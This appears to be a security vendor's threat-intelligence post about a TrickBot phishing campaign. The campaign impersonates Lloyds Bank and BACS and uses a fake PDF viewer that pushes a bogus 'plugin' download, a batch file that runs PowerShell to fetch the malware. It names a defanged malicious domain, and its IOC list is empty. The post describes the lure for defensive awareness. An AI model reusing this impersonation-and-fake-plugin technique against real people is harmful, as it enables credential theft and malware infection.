TrickBot Operators Rapidly Adopt “Plug In” for Delivery, Possibly Following Dreambot’s Lead
Recently, Cofense IntelligenceTM reported on a new mechanism used to distribute Dreambot malware, where a malicious page impersonating Microsoft Office Online entices victims to download the banking trojan. We have noted a similar delivery technique in the distribution of a TrickBot sample where targets are required to download a “plugin” to interact with a PDF, adding to the iteration of purported “plugin” downloads for malware delivery. The detailed campaign leverages social engineering techniques to gain access to victims’ sensitive information and also contains code obfuscation to evade detection by security technologies.
This phishing lure is crafted to spoof the BACs (Bankers’ Automated Clearing Services) brand and the Lloyds Bank brand and logo, indicating the phishers are likely targeting residents of the United Kingdom. The threat actors attempt to increase their perceived legitimacy by including a password for an allegedly urgent document— supposedly accessed via an embedded link. The link opens a browser window to display an interactive PDF viewer (Figure 1). The overall sophistication of this phishing email and social engineering employed following the initial click suggests TrickBot threat actors are attempting to fool more phishing-aware targets.
Figure 1: Lloyds Bank phishing message containing embedded link to a browser window
Hosted on a spoofed domain name, “lloydsbankdocs[.]com,” the page renders a PDF viewer displaying a document created by “Lloyds Bank Group,” as seen in Figure 2. When the user attempts to interact with the PDF viewer, a pop-up appears claiming that the document “cannot be read by current plugin version,” Figure 3.
Figure 2: Interactive PDF viewer impersonating Lloyds Bank
Figure 3: Pop-up prompting the victim to download an “Adobe PDF Web-Plugin”
Figure 5: Batch file uses PowerShell to download and run the TrickBot malware
We continue to observe TrickBot’s growing sophistication as the malware evolves in both in its infection and delivery methodology. The similarities to Dreambot’s recent delivery highlight two possible factors that impact the phishing threat landscape. First, threat actors observe the work and success of others and can rapidly replicate and modify new tactics, techniques and procedures (TTPs). Similarly, this “plugin” delivery method may be part of a kit bought and sold to threat actor groups for the distribution of multiple prominent malware campaigns.
Either way, enterprises must be prepared for the proliferation of increasingly convincing phishing lures. Organizations should establish a multifaceted defense strategy, one with a reliance on user training and education to identify suspicious emails to prevent similar attacks to their infrastructure. To ensure relevant training and prepare for these threats, threat intelligence integration becomes necessary to explicitly understand how threat actors are adopting new TTPs—such as new delivery methods and increasingly convincing narratives—to compromise end users.
Don’t miss out on another threat – sign up for our complimentary Threat Alerts service delivered straight to your email inbox at no charge.
Indicators of Compromise (IOCs)
Dropped Batch file MD5:
Batch file payload location: